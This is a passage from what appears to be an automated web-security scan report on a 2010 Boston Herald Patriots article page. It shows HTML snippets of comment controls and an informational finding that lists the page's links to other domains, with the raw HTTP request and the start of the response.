<img style="visibility: hidden;" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_f2_16.png" width="2" height="17" />
<img style="visibility: hidden;" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_f2_16.png" width="2" height="17" /></div>
...[SNIP]...
<a href="javascript:;" title="Good Comment" onclick="addRating(1818731,5,0);" ><img id="thumb_up_1818731" class="thumb_up" alt="Good Comment" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_16.png" onmouseout="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_16.png'" onblur="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_16.png'" onmouseover="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_f2_16.png'" /></a>
...[SNIP]...
<a href="javascript:;" title="Poor Comment" onclick="addRating(1818731,1,0);"><img id="thumb_down_1818731" class="thumb_down" alt="Poor Comment" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_16.png" onmouseout="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_16.png'" onblur="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_16.png'"onmouseover="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_f2_16.png'" /></a>
...[SNIP]...
<a class="Reply" href="#CommentPostArea" onclick="setReplyToField(1818731, 'ltd');" ><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/comments_reply.png" /> Reply</a>
...[SNIP]...
<a href="/sports/football/patriots/view.bg?articleid=1294646&format=comments&cnum=1&at_comment=1818731#cnum1818731"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/page_white_link.png" /> Link</a>
...[SNIP]...
<a class="Flag" href="#" onclick="flagPost('1818731','/sports/football/patriots/view.bg?articleid=1294646&cnum=1'); return false;"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniAbuse.gif"> Abusive</a>
...[SNIP]...

<img style="visibility: hidden;" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_f2_16.png" width="2" height="17" />
<img style="visibility: hidden;" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_f2_16.png" width="2" height="17" /></div>
...[SNIP]...
<a href="javascript:;" title="Good Comment" onclick="addRating(1818735,5,0);" ><img id="thumb_up_1818735" class="thumb_up" alt="Good Comment" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_16.png" onmouseout="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_16.png'" onblur="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_16.png'" onmouseover="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_f2_16.png'" /></a>
...[SNIP]...
<a href="javascript:;" title="Poor Comment" onclick="addRating(1818735,1,0);"><img id="thumb_down_1818735" class="thumb_down" alt="Poor Comment" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_16.png" onmouseout="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_16.png'" onblur="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_16.png'"onmouseover="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_f2_16.png'" /></a>
...[SNIP]...
<a class="Reply" href="#CommentPostArea" onclick="setReplyToField(1818735, 'ltd');" ><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/comments_reply.png" /> Reply</a>
...[SNIP]...
<a href="/sports/football/patriots/view.bg?articleid=1294646&format=comments&cnum=1&at_comment=1818735#cnum1818735"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/page_white_link.png" /> Link</a>
...[SNIP]...
<a class="Flag" href="#" onclick="flagPost('1818735','/sports/football/patriots/view.bg?articleid=1294646&cnum=1'); return false;"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniAbuse.gif"> Abusive</a>
...[SNIP]...

<img style="visibility: hidden;" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_f2_16.png" width="2" height="17" />
<img style="visibility: hidden;" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_f2_16.png" width="2" height="17" /></div>
...[SNIP]...
<a href="javascript:;" title="Good Comment" onclick="addRating(1818821,5,0);" ><img id="thumb_up_1818821" class="thumb_up" alt="Good Comment" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_16.png" onmouseout="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_16.png'" onblur="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_16.png'" onmouseover="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_f2_16.png'" /></a>
...[SNIP]...
<a href="javascript:;" title="Poor Comment" onclick="addRating(1818821,1,0);"><img id="thumb_down_1818821" class="thumb_down" alt="Poor Comment" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_16.png" onmouseout="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_16.png'" onblur="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_16.png'"onmouseover="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_f2_16.png'" /></a>
...[SNIP]...
<a class="Reply" href="#CommentPostArea" onclick="setReplyToField(1818821, 'onyourmark');" ><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/comments_reply.png" /> Reply</a>
...[SNIP]...
<a href="/sports/football/patriots/view.bg?articleid=1294646&format=comments&cnum=1&at_comment=1818821#cnum1818821"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/page_white_link.png" /> Link</a>
...[SNIP]...
<a class="Flag" href="#" onclick="flagPost('1818821','/sports/football/patriots/view.bg?articleid=1294646&cnum=1'); return false;"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniAbuse.gif"> Abusive</a>
...[SNIP]...

<img style="visibility: hidden;" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_f2_16.png" width="2" height="17" />
<img style="visibility: hidden;" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_f2_16.png" width="2" height="17" /></div>
...[SNIP]...
<a href="javascript:;" title="Good Comment" onclick="addRating(1818822,5,0);" ><img id="thumb_up_1818822" class="thumb_up" alt="Good Comment" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_16.png" onmouseout="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_16.png'" onblur="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_16.png'" onmouseover="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_f2_16.png'" /></a>
...[SNIP]...
<a href="javascript:;" title="Poor Comment" onclick="addRating(1818822,1,0);"><img id="thumb_down_1818822" class="thumb_down" alt="Poor Comment" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_16.png" onmouseout="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_16.png'" onblur="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_16.png'"onmouseover="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_f2_16.png'" /></a>
...[SNIP]...
<a class="Reply" href="#CommentPostArea" onclick="setReplyToField(1818822, 'tommytee3');" ><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/comments_reply.png" /> Reply</a>
...[SNIP]...
<a href="/sports/football/patriots/view.bg?articleid=1294646&format=comments&cnum=1&at_comment=1818822#cnum1818822"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/page_white_link.png" /> Link</a>
...[SNIP]...
<a class="Flag" href="#" onclick="flagPost('1818822','/sports/football/patriots/view.bg?articleid=1294646&cnum=1'); return false;"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniAbuse.gif"> Abusive</a>
...[SNIP]...

<img style="visibility: hidden;" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_f2_16.png" width="2" height="17" />
<img style="visibility: hidden;" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_f2_16.png" width="2" height="17" /></div>
...[SNIP]...
<a href="javascript:;" title="Good Comment" onclick="addRating(1818830,5,0);" ><img id="thumb_up_1818830" class="thumb_up" alt="Good Comment" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_16.png" onmouseout="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_16.png'" onblur="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_16.png'" onmouseover="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_f2_16.png'" /></a>
...[SNIP]...
<a href="javascript:;" title="Poor Comment" onclick="addRating(1818830,1,0);"><img id="thumb_down_1818830" class="thumb_down" alt="Poor Comment" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_16.png" onmouseout="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_16.png'" onblur="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_16.png'"onmouseover="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_f2_16.png'" /></a>
...[SNIP]...
<a class="Reply" href="#CommentPostArea" onclick="setReplyToField(1818830, 'notoneofdem');" ><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/comments_reply.png" /> Reply</a>
...[SNIP]...
<a href="/sports/football/patriots/view.bg?articleid=1294646&format=comments&cnum=1&at_comment=1818830#cnum1818830"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/page_white_link.png" /> Link</a>
...[SNIP]...
<a class="Flag" href="#" onclick="flagPost('1818830','/sports/football/patriots/view.bg?articleid=1294646&cnum=1'); return false;"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniAbuse.gif"> Abusive</a>
...[SNIP]...

<img style="visibility: hidden;" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_f2_16.png" width="2" height="17" />
<img style="visibility: hidden;" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_f2_16.png" width="2" height="17" /></div>
...[SNIP]...
<a href="javascript:;" title="Good Comment" onclick="addRating(1818838,5,0);" ><img id="thumb_up_1818838" class="thumb_up" alt="Good Comment" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_16.png" onmouseout="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_16.png'" onblur="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_16.png'" onmouseover="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_f2_16.png'" /></a>
...[SNIP]...
<a href="javascript:;" title="Poor Comment" onclick="addRating(1818838,1,0);"><img id="thumb_down_1818838" class="thumb_down" alt="Poor Comment" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_16.png" onmouseout="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_16.png'" onblur="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_16.png'"onmouseover="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_f2_16.png'" /></a>
...[SNIP]...
<a class="Reply" href="#CommentPostArea" onclick="setReplyToField(1818838, 'Ball4');" ><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/comments_reply.png" /> Reply</a>
...[SNIP]...
<a href="/sports/football/patriots/view.bg?articleid=1294646&format=comments&cnum=1&at_comment=1818838#cnum1818838"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/page_white_link.png" /> Link</a>
...[SNIP]...
<a class="Flag" href="#" onclick="flagPost('1818838','/sports/football/patriots/view.bg?articleid=1294646&cnum=1'); return false;"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniAbuse.gif"> Abusive</a>
...[SNIP]...

<img style="visibility: hidden;" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_f2_16.png" width="2" height="17" />
<img style="visibility: hidden;" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_f2_16.png" width="2" height="17" /></div>
...[SNIP]...
<a href="javascript:;" title="Good Comment" onclick="addRating(1818844,5,0);" ><img id="thumb_up_1818844" class="thumb_up" alt="Good Comment" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_16.png" onmouseout="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_16.png'" onblur="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_16.png'" onmouseover="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_f2_16.png'" /></a>
...[SNIP]...
<a href="javascript:;" title="Poor Comment" onclick="addRating(1818844,1,0);"><img id="thumb_down_1818844" class="thumb_down" alt="Poor Comment" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_16.png" onmouseout="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_16.png'" onblur="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_16.png'"onmouseover="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_f2_16.png'" /></a>
...[SNIP]...
<a class="Reply" href="#CommentPostArea" onclick="setReplyToField(1818844, 'Chubinela');" ><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/comments_reply.png" /> Reply</a>
...[SNIP]...
<a href="/sports/football/patriots/view.bg?articleid=1294646&format=comments&cnum=1&at_comment=1818844#cnum1818844"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/page_white_link.png" /> Link</a>
...[SNIP]...
<a class="Flag" href="#" onclick="flagPost('1818844','/sports/football/patriots/view.bg?articleid=1294646&cnum=1'); return false;"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniAbuse.gif"> Abusive</a>
...[SNIP]...

<img style="visibility: hidden;" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_f2_16.png" width="2" height="17" />
<img style="visibility: hidden;" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_f2_16.png" width="2" height="17" /></div>
...[SNIP]...
<a href="javascript:;" title="Good Comment" onclick="addRating(1818872,5,0);" ><img id="thumb_up_1818872" class="thumb_up" alt="Good Comment" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_16.png" onmouseout="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_16.png'" onblur="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_16.png'" onmouseover="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_f2_16.png'" /></a>
...[SNIP]...
<a href="javascript:;" title="Poor Comment" onclick="addRating(1818872,1,0);"><img id="thumb_down_1818872" class="thumb_down" alt="Poor Comment" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_16.png" onmouseout="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_16.png'" onblur="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_16.png'"onmouseover="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_f2_16.png'" /></a>
...[SNIP]...
<a class="Reply" href="#CommentPostArea" onclick="setReplyToField(1818872, 'ebos2009');" ><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/comments_reply.png" /> Reply</a>
...[SNIP]...
<a href="/sports/football/patriots/view.bg?articleid=1294646&format=comments&cnum=1&at_comment=1818872#cnum1818872"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/page_white_link.png" /> Link</a>
...[SNIP]...
<a class="Flag" href="#" onclick="flagPost('1818872','/sports/football/patriots/view.bg?articleid=1294646&cnum=1'); return false;"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniAbuse.gif"> Abusive</a>
...[SNIP]...

<img style="visibility: hidden;" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_f2_16.png" width="2" height="17" />
<img style="visibility: hidden;" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_f2_16.png" width="2" height="17" /></div>
...[SNIP]...
<a href="javascript:;" title="Good Comment" onclick="addRating(1818875,5,0);" ><img id="thumb_up_1818875" class="thumb_up" alt="Good Comment" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_16.png" onmouseout="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_16.png'" onblur="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_16.png'" onmouseover="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_f2_16.png'" /></a>
...[SNIP]...
<a href="javascript:;" title="Poor Comment" onclick="addRating(1818875,1,0);"><img id="thumb_down_1818875" class="thumb_down" alt="Poor Comment" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_16.png" onmouseout="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_16.png'" onblur="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_16.png'"onmouseover="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_f2_16.png'" /></a>
...[SNIP]...
<a class="Reply" href="#CommentPostArea" onclick="setReplyToField(1818875, 'jrich1970');" ><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/comments_reply.png" /> Reply</a>
...[SNIP]...
<a href="/sports/football/patriots/view.bg?articleid=1294646&format=comments&cnum=1&at_comment=1818875#cnum1818875"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/page_white_link.png" /> Link</a>
...[SNIP]...
<a class="Flag" href="#" onclick="flagPost('1818875','/sports/football/patriots/view.bg?articleid=1294646&cnum=1'); return false;"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniAbuse.gif"> Abusive</a>
...[SNIP]...
</a>  |  <a class="LinksRedNone" style="text-decoration:underline" href="http://www.heraldmedia.com/privacy.html" target="_new">Privacy commitment</a>
...[SNIP]...
<a href="/sports/football/patriots/view.bg?articleid=1294646&format=comments#CommentsArea"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif"
alt="Comments" />(32) Comments  |  Post / Read Comments</a>
...[SNIP]...
<div id="nextArticleTease" style="display:none">
<img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniArticle.gif"> <b>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
<div id="trackPhotoGalleryPicArea"><img id="trackMainImage" class="mainImage" src="http://multimedia.heraldinteractive.com/images/20101107/c38bb9_Drew_11072010.jpg" alt="SALUD: Drew and Maura..." /></div>
...[SNIP]...
<a href="/sports/football/patriots/view/20101105pryor_fined_7500_for_favre_hit/"><img src="http://multimedia.heraldinteractive.com/images/20101105/stp/a857bc_ltppryor20101105.jpg" alt="Pryor fined $7,500 for Favre hit" /></a>
...[SNIP]...
<a href="/sports/football/patriots/view/20101104myron_pryor_comes_clean_on_hit/"><img src="http://multimedia.heraldinteractive.com/images/20101104/stp/0e0056_dan_11042010.jpg" alt="Myron Pryor comes clean on hit" /></a>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
<span style="bold"><a href="http://hotjobs.yahoo.com/job-search;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald&kw=bostonherald.com&locations=Boston%2C+MA&metro_search_proxy=1&metro_search=1&industry=" target="_new">Jobs with Herald Media</a>
...[SNIP]...
<div style="padding:15px; text-align:center;">
<a href="http://www.bostonheraldineducation.com" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nie.gif" alt="N.I.E." /></a>
<a href="http://bostonheraldnie.newspaperdirect.com" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nieSmart.gif" alt="Smart Edition" /></a>
<a href="http://www.massliteracy.org" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/mlf.gif" alt="Mass Literacy Foundation" /></a>
...[SNIP]...
<br />No portion of BostonHerald.com or its content may be reproduced without the owner's written permission. <a href="http://www.heraldmedia.com/privacy.html">Privacy Commitment</a>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Fsports%2Ffootball%2Fpatriots%2Fview%2F20101107just_as_he_drew_it_up_bledsoes_post-career_planning_a_big_success_thanks_to_family_and_businesses_worth_toasting%2Fformat%3Dcomments%26srvc%3Dhome%26position%3D4&c5=&c6=&c15=" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
<noscript>
<a href="http://www.quantcast.com/p-352ZWwG8I7OVQ" target="_blank"><img
src="http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif" style="display:
none;" border="0" height="1" width="1" alt="Quantcast"/></a>
...[SNIP]...

8.48. http://bostonherald.com/sports/football/patriots/view.bg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/sports/football/patriots/view.bg

Issue detail

The page was loaded from a URL containing a query string:

http://bostonherald.com/sports/football/patriots/view.bg?articleid=1294646&srvc=home&position=active

The response contains the following links to other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Fsports%2Ffootball%2Fpatriots%2Fview%2F20101107just_as_he_drew_it_up_bledsoes_post-career_planning_a_big_success_thanks_to_family_and_businesses_worth_toasting%2Fsrvc%3Dsports%26position%3Dalso&c5=&c6=&c15=
http://bostonherald.boocoo.com/
http://bostonheraldnie.newspaperdirect.com/
http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif
http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png
http://cache.heraldinteractive.com/images/siteImages/icons/fontLarge.gif
http://cache.heraldinteractive.com/images/siteImages/icons/fontSmall.gif
http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniArticle.gif
http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif
http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniEmail.gif
http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniPrint.gif
http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/facebook.png
http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/twitter.png
http://cache.heraldinteractive.com/images/siteImages/reporters/ron_borges.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/mlf.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/nie.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/nieSmart.gif
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://feeds.feedburner.com/bostonherald/sports/football/patriots/
http://hotjobs.yahoo.com/job-search;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald&kw=bostonherald.com&locations=Boston%2C+MA&metro_search_proxy=1&metro_search=1&industry=
http://multimedia.heraldinteractive.com/images/20101104/stp/0e0056_dan_11042010.jpg
http://multimedia.heraldinteractive.com/images/20101105/stp/a857bc_ltppryor20101105.jpg
http://multimedia.heraldinteractive.com/images/20101107/c38bb9_Drew_11072010.jpg
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif
http://s7.addthis.com/js/200/addthis_widget.js
http://scores.heraldinteractive.com/merge/tsnform.aspx?c=bostonherald&page=nfl/teams/077/team.aspx?id=077
http://twitter.com/bostonherald
http://www.addthis.com/bookmark.php?v=20
http://www.bostonheraldineducation.com/
http://www.carfind.com/
http://www.facebook.com/pages/BostonHeraldcom/197211981599
http://www.heraldmedia.com/privacy.html
http://www.homefind.com/
http://www.legacy.com/obituaries/bostonherald/
http://www.massliteracy.org/
http://www.quantcast.com/p-352ZWwG8I7OVQ

Request

GET /sports/football/patriots/view.bg?articleid=1294646&srvc=home&position=active HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=235728274.418299420.1289175424.1289175424.1289175424.1; __utmc=235728274; __utmb=235728274.16.10.1289175424; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8|O1021J6R; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 07:23:06 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 46639

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Fsports%2Ffootball%2Fpatriots%2Fview%2F20101107just_as_he_drew_it_up_bledsoes_post-career_planning_a_big_success_thanks_to_family_and_businesses_worth_toasting%2Fsrvc%3Dsports%26position%3Dalso&c5=&c6=&c15=" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
<a href="/">
<img src="http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif" class="headerLogoSpacer">
</a>
...[SNIP]...
<li id="obits" class="tab" onmouseover="this.className=this.className+'Hover'; return false;" onmouseout="this.className=this.className.replace('Hover',''); " onclick=""><a href="http://www.legacy.com/obituaries/bostonherald/">Obituaries</a>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Features <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Features">

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>

